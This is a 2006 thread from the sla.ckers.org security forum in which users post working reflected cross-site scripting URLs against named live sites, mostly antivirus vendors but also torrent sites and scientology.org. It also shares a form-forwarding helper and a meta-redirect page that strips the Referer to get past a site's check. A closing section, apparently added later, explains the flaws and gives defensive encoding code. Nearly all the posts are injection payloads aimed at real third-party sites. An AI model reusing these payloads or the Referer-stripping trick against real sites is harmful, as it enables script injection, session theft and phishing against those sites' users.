Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: maluc
Date: September 29, 2006 10:56PM

http://livesupport.bitdefender.ro/request.php?l=admin&x=1&deptid=1&page=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx=%20

-maluc



Edited 1 time(s). Last edit at 09/29/2006 10:57PM by maluc.

Re: So it begins
Posted by: maluc
Date: September 29, 2006 11:02PM

http://support.drweb.com/support_request/?name2=user&topic=registration&keynum=none&first=-&name1=XSS+is+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+&email=XSS+here+too%22%3E%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cx+&question=And+here%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&submit=Send

-maluc

Re: So it begins
Posted by: maluc
Date: September 29, 2006 11:15PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.norman.com/News/Subscriptions/18805/en-us&lime_uniqueIdentifier=1&Service=all_mailinglists&Form=frmHome&CWDSerialNumber=&StateVar1=Default&StateVar2=0&dfsEmail=XSS%20is%20here%22%3E%3Cscript%3Ealert(%22XSS0%22)%3C/script%3E%3Cx%20&pbFetch=Fetch+Info&dfsName=XSS%20here%20too%22%3E%3Cscript%3Ealert(%22XSS1%22)%3C/script%3E%3Cx%20&cmbGeneral_Language= norman.com - yet another antivirus vendor

-maluc

Re: So it begins
Posted by: maluc
Date: September 29, 2006 11:23PM

http://www.sophos.com/products/sb/sbs/eval/?field_platforms=1&field_forename=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS0%22%29%3C%2Fscript%3E%3Cx+&field_surname=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E%3Cx+&field_company=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cx+&field_job_title=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E%3Cx+&field_phone_number=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3C%2Fscript%3E%3Cx+&field_email=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS5%22%29%3C%2Fscript%3E%3Cx+&field_address=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS6%22%29%3C%2Fscript%3E%3Cx+&field_address_2=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS7%22%29%3C%2Fscript%3E%3Cx+&field_city=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS8%22%29%3C%2Fscript%3E%3Cx+&field_zip_postal=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS9%22%29%3C%2Fscript%3E%3Cx+&field_country=choose&field_region=XSS+here%22%3E%3Cscript%3Ealert%28%22XSSA%22%29%3C%2Fscript%3E%3Cx+&field_region_list_9=choose&field_region_list_32=choose&field_region_list_183=choose&field_company_size=choose&field_number_users=choose&field_market_sector=choose&submit.x=0&submit.y=0&submit=Submit&lp_keyword=&sid=&path=&field_product=Sophos+Small+Business+Suite&field_lead_id=&field_prom_id=&referer=&main_form=1

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 11:40PM

I'm not sure how to put this into a string even for xss_post_forwarder, but the site is https://www.astalavista.net/?cmd=adv&act=login and ">';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} goes in the email field.

https://www.astalavista.net/?cmd=sup&act=pwd Is also vulnerable.



Edited 1 time(s). Last edit at 09/29/2006 11:41PM by Ghozt.

Re: So it begins
Posted by: maluc
Date: September 30, 2006 12:00AM

https://shop.pandasoftware.com/entrada.aspx?idioma=en-us&returnUrl=%22);%7D%7D%20alert(%22XSS%22);%7B%7Bx=eval(%22

this.. was quite tricky to insert without breaking the script. everything there is the minimum

-maluc

Re: So it begins
Posted by: maluc
Date: September 30, 2006 12:54AM

previously disclosed by Ghozt, just click friendly:
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.astalavista.net/%3fcmd=adv%26act=dologin&frmAdvLogin_EMail=XSS+is+here%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cx+&frmAdvLogin_PW= astalavista.net

and i'm unable to add the second one.. because whiteacid's script won't allow it.. it seems to be because the strings 'cmd' and 'pwd' are in the URL .. why? no clue.

but here it is anyway: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.astalavista.net/%3fcmd=sup%26act=pwd&frmPwd_type=mem&frmPwd_address=XSS+here+too%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20

and you're right that those were tricky to turn into a URL..

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 30, 2006 01:00AM

http://www.guestcity.com/cgi-bin/view.fcgi?book=XSSman%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx
http://snarf-it.org/?show=search&query=XSSman%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/script%3E%3Cx+



Edited 2 time(s). Last edit at 09/30/2006 01:14AM by Ghozt.

Re: So it begins
Posted by: Ghozt
Date: September 30, 2006 01:15AM

http://thepiratebay.org/search.php?q=XSSman%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/script%3E%3Cx+
http://torrentreactor.net/search.php?search=&words=XSSman%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/script%3E%3Cx+



Edited 1 time(s). Last edit at 09/30/2006 01:16AM by Ghozt.

Re: So it begins
Posted by: Ghozt
Date: September 30, 2006 01:55AM

https://www.scientology.org/html/std/portal/login/cosRegistration1Submitter.jsp?csDomain=scientology&csSiteId=scientology&csLocale=en_US&csFolder=portal/login&firstName=XSSman%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/script%3E%3Cx%20%26lastName%3D%22%29%3Balert%28%22XSS%22%29%3C/script%3E%3Cx%26emailAddress%3Dnull%2540none.org%26iasNumber%3D1111111111111111%26userId%3Duserme%26userPassword%3Daaaaaa%26userPassword2%3Daaaaaa



Edited 5 time(s). Last edit at 09/30/2006 02:07AM by Ghozt.

Re: So it begins
Posted by: maluc
Date: September 30, 2006 02:30AM

http://www.rav.ro/pages/search.php?q=XSS+here%27%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+&submit=Go

-maluc

Re: So it begins
Posted by: maluc
Date: September 30, 2006 02:31AM

http://www.quickheal.co.in/site_search.asp?search=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx&submit=Search+%3E%3E

-maluc

Re: So it begins
Posted by: maluc
Date: September 30, 2006 03:08AM

was tricky to find one on this site, filtered most everything.

http://www.grisoft.com/doc/asdf%22%3E%3Cbody%20onload=alert('XSS')%3E%3Cx%20/lng/us/tpl/tpl01

-maluc

Re: So it begins
Posted by: WhiteAcid
Date: September 30, 2006 06:53AM

maluc, I have no idea why that doesn't work, presumably something my host has in place which I can't change. the source code is available for my script (.phps file) so people can look there, but I doubt you'll find anything.

Otherwise... good finds.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: id
Date: September 30, 2006 01:34PM

oh good, I get to give netcmd shit over one of these ;0

-id

Re: So it begins
Posted by: Ghozt
Date: September 30, 2006 02:29PM

http://www.phazeddl.com/search.php?q=%22/%3E%3Ciframe%20src%3Dhttp%3A//google.com%20
The best I can do is an iframe, the filters are hard. ha.ckers.org/scriptlet.html works but the alerts are opened in ha.ckers.org so it's useless.



Edited 3 time(s). Last edit at 09/30/2006 02:56PM by Ghozt.

Re: So it begins
Posted by: rsnake
Date: September 30, 2006 04:20PM

Not for CSRF or redirection. ;) Don't worry about it Ghozt, it's still a valuable piece of information!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:22PM

https://tools.sonic.net/phplive/request.php?l=administrator&x=1&page=%22%3E%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E%3Cx

they apparently passed the 'hackers safe' test

-maluc

Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:26PM

swedish version of youtube.. http://bubblare.se/search.jsp?query=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E

-maluc

Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:30PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.authentium.com/support/password/RegistrationMod.asp&txtSerial=a%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&txtreseller=&cboMonth=9&cboDay=30&cboYear=2006&txtUserName=&txtPassword=&txtVerifyPassword=&txtHint= authentium.com .. another antivirus company i found on this list http://blog.washingtonpost.com/securityfix/2005/12/ranking_response_times_for_ant.html

didn't finish them all before falling asleep last night ..

-maluc

Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:38PM

http://alerts.f-prot.com/cgi-bin/alerts_subscribe.pl?name=XSS%20here%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&email=&action=confirm&lang=en&step=step_1&next=step_2&submit=%A0%A0%A0%A0Submit%A0%3E%3E%A0%A0%A0

-maluc

Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:45PM

http://www.trendmicro.com/download/trial/thankyou.asp?Name=XSSman%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&id=Trend%20Micro%20Anti-Spyware%20Enterprise%20Edition&productid=68

-maluc

Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:50PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.ikarus-software.at/portal/modules.php?name=Search&query=XSS+holes%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cz+&topic=&category=0&author=&days=0&type=stories ikarus-software.at - another antivirus company i've never heard of

-maluc

Re: So it begins
Posted by: Kyran
Date: September 30, 2006 05:56PM

Ghozt Wrote:
-------------------------------------------------------
> http://www.phazeddl.com/search.php?q=%22/%3E%3Cifr
> ame%20src%3Dhttp%3A//google.com%20
> The best I can do is an iframe, the filters are
> hard. ha.ckers.org/scriptlet.html works but the
> alerts are opened in ha.ckers.org so it's useless.


How about flash? http://www.phazeddl.com/search.php?q=%3C/title%3E%3Cembed%20src=http://www.flashflashrevolution.com/SpinItUp86-60fps-vis.swf%3E

Also, this brings up something, rsnake, care to make an "alert.swf"?
name should be self-explanatory. :P

- Kyran

Re: So it begins
Posted by: maluc
Date: September 30, 2006 05:57PM

http://www.asw.cz/i_kat_207.php?lang=LeetSpeek%22><script>alert(String.fromCharCode(88,83,83))</script><x%20
http://www.avast.com/i_kat_207.php?lang=LeetSpeek%22><script>alert(String.fromCharCode(88,83,83))</script><x%20

same website, same hole, just different domain

-maluc



Edited 1 time(s). Last edit at 09/30/2006 06:07PM by maluc.

Re: So it begins
Posted by: maluc
Date: September 30, 2006 06:06PM

since it's in the <head>,

</title><meta blah> works well..

http://www.phazeddl.com/search.php?q=%3C/title%3E%3CMETA%20HTTP-EQUIV=refresh%20CONTENT=0;url=javascript:alert(String.fromCharCode(88,83,83));%3E

-maluc

Re: So it begins
Posted by: maluc
Date: September 30, 2006 06:25PM

http://scripts.sitesled.com/metaredir.html?http://www.ca.com/cgi-bin/template_form.cgi?subject=CA+Product+Information+Request&recipient=myetrustclientadvocate%40ca.com&mail_from_email=y&title=CA+Product+Information+Request&required=Country%2COrganizer%2CInterested%2CName%2Cemail%2CState_or_Province%2CZip_or_Postal_Code&field_alias=Country%3DCountry%2COrganizer%3DI+am+a%2CInterested%3DInterested+In%2CName%3DName%2CTitle%3DTitle%2CPhoneAreaCode%3DPhone+Area+Code%2CPhoneExchange%3DPhone+Exchange%2CPhoneConvert%3DPhone+Convert%2CPhoneExt%3DPhone+Extension%2CFax%3DFax%2Cemail%3DEmail+Address%2CCompany%3DCompany+Name%2CAddress%3DAddress%2CAddress2%3DAddress2%2CCity%3DCity%2CState_or_Province%3DState+or+Province%2CZip_or_Postal_Code%3DZip+or+Postal+Code%2CQuestion%3DQuestions+or+comments%2CCall%3DWould+you+like+someone+to+call+you%2CTime_to_Call%3Dwhat+time+%28your+local+time%29+is+most+convenient+for+you&sort=order%3Adate%2Ctime%2CCountry%2COrganizer%2CInterested%2CName%2CTitle%2CPhoneAreaCode%2CPhoneExchange%2CPhoneConvert%2CPhoneExt%2CFax%2Cemail%2CCompany%2CAddress%2CAddress2%2CCity%2CState_or_Province%2CZip_or_Postal_Code%2CQuestion%2CCall%2CTime_to_Call&env_report=REMOTE_HOST%2CHTTP_USER_AGENT&bgcolor=%23FFFFFF&return_link_title=CA+Home+Page&print_blank_fields=1&return_link_url=%2F&print_config=email%2Csubject&filesave=product_info_request.txt&filesave_type=text-delimited&filesave_section=%2F&filesave_delimiter=pipe&Country=United+States&Organizer=Home+User&Interested=eTrust+EZ+Antivirus&Name=XSSman%3Cscript%3Ealert%28%22XSS0%22%29%3C%2Fscript%3E&Title=XSSman%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E&PhoneAreaCode=XSSman%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E&PhoneExchange=XSSman%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&PhoneConvert=XSSman%3Cscript%3Ealert%28%22XSS4%22%29%3C%2Fscript%3E&PhoneExt=XSSman%3Cscript%3Ealert%28%22XSS5%22%29%3C%2Fscript%3E&Fax=XSSman%3Cscript%3Ealert%28%22XSS6%22%29%3C%2Fscript%3E&email=XSSman%3Cscript%3Ealert%28%22XSS
7%22%29%3C%2Fscript%3E%40intar.net&Company=XSSman%3Cscript%3Ealert%28%22XSS8%22%29%3C%2Fscript%3E&Address=XSSman%3Cscript%3Ealert%28%22XSS9%22%29%3C%2Fscript%3E&Address2=XSSman%3Cscript%3Ealert%28%22XSSA%22%29%3C%2Fscript%3E&City=XSSman%3Cscript%3Ealert%28%22XSSB%22%29%3C%2Fscript%3E&State_or_Province=XSSman%3Cscript%3Ealert%28%22XSSC%22%29%3C%2Fscript%3E&Zip_or_Postal_Code=XSSman%3Cscript%3Ealert%28%22XSSD%22%29%3C%2Fscript%3E&Question=XSSman%3Cscript%3Ealert%28%22XSSE%22%29%3C%2Fscript%3E&Time_to_Call=XSSman%3Cscript%3Ealert%28%22XSSF%22%29%3C%2Fscript%3E <--ca.com there's 16 different alerts, just to warn you

-maluc



Edited 3 time(s). Last edit at 09/30/2006 08:21PM by maluc.

Re: So it begins
Posted by: maluc
Date: September 30, 2006 06:30PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.virusbuster.hu/en/newsletter/admin/&type_alert=1&type_security=1&type_news=1&type_products=1&email=XSS%20here%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx%20&newsletter.x=0&newsletter.y=0&newsletter_submitted=1&nletter_email_submit=1 virusbuster.hu

-maluc

Re: So it begins
Posted by: Kyran
Date: September 30, 2006 06:34PM

maluc Wrote:
-------------------------------------------------------
> http://www.ca.com/ there's 16 different alerts,
> just to warn you
>
> -maluc


For the record,

Error: http://sla.ckers.org/forum/read.php?3,44,page=13 is not allowed access to this program.
This form cannot complete!

Needs to be copypasta'd

- Kyran

Re: So it begins
Posted by: maluc
Date: September 30, 2006 06:55PM

ah, you're right.. the referrer has to be cleared first.. so i wrote a simple page that meta redirects to it, which clears the referrer. It's general purpose, but let me know if it's buggy

Usage: http://scripts.sitesled.com/metaredir.html?http://asdf.com h ttp://scripts.sitesled.com/metaredir.html?h ttp://asdf.com (without the spaces, obviously)

Edit: changed the subdomain
-maluc



Edited 1 time(s). Last edit at 09/30/2006 08:22PM by maluc.
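
The links in this thread work because each site echoes a request parameter into a quoted attribute, a `<textarea>` or `<title>` body, or an inline script string without encoding it for that context, and because the last form's Referer check lets a request with no Referer through. The following is an added example from the defender's side, not code from the thread or from any of the sites named; every function name and the `forms.example.test` origin are hypothetical, and the sample inputs are constructed from the decoded shapes of the parameters posted above.

```javascript
// Added example: context-specific output encoding plus a Referer check that
// fails closed. All names are hypothetical; inputs are constructed samples.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// For text placed in an element body (<textarea>, <title>) or a quoted attribute value.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// For text placed inside an inline <script> as a string literal. JSON.stringify
// escapes quotes and backslashes; the extra pass keeps "</script>" and the
// line separators U+2028/U+2029 from ending the literal or the script block.
function encodeJsString(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Referer check that rejects a missing or unparsable header instead of allowing it.
function refererAllowed(refererHeader, allowedOrigin) {
  if (!refererHeader) return false;
  try {
    return new URL(refererHeader).origin === allowedOrigin;
  } catch (err) {
    return false;
  }
}

// Constructed inputs: attribute breakout, textarea breakout, script-string breakout.
const attrBreakout = 'XSS here"><script>alert("XSS")</script><x ';
const textareaBreakout = 'And here</textarea><script>alert("XSS3")</script>';
const jsBreakout = '");}} alert("XSS");{{x=eval("';

// Each value is encoded for the context it lands in, not with one shared filter.
function renderSearchPage(query, comment, returnUrl) {
  return [
    `<input name="q" value="${encodeHtml(query)}">`,
    `<textarea name="question">${encodeHtml(comment)}</textarea>`,
    `<script>var returnUrl = ${encodeJsString(returnUrl)};</script>`,
  ].join('\n');
}

console.log(renderSearchPage(attrBreakout, textareaBreakout, jsBreakout));
console.log(refererAllowed(undefined, 'https://forms.example.test'));
```

Some browsers and proxies strip the Referer header for ordinary users, so a fail-closed Referer check will reject them too; a per-session form token is the sturdier control for the same purpose.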
